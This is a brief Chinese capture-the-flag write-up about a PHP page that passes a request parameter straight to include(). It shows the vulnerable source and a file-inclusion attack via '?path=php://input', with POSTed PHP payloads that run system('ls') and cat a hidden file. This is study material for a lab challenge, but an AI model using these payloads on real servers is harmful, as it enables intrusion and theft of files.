进去发现是一段源码:
<?php
show_source(__FILE__);
if(isset($_REQUEST['path'])){
include($_REQUEST['path']);
}else{
include('phpinfo.php');
}
默认是输出了phpinfo.php,因此查看里面的漏洞,提示是文件包含,找include,发现允许url注入,允许php://input
的形式,使用post传输数据。
注入一句话木马,在浏览器中后缀?path=php://input
使用burpsuite:
(1)查看有什么文件:<?php echo system('ls');?>
(2)查看特殊文件里的内容:<?php system("cat dle345aae.php");?>
网友评论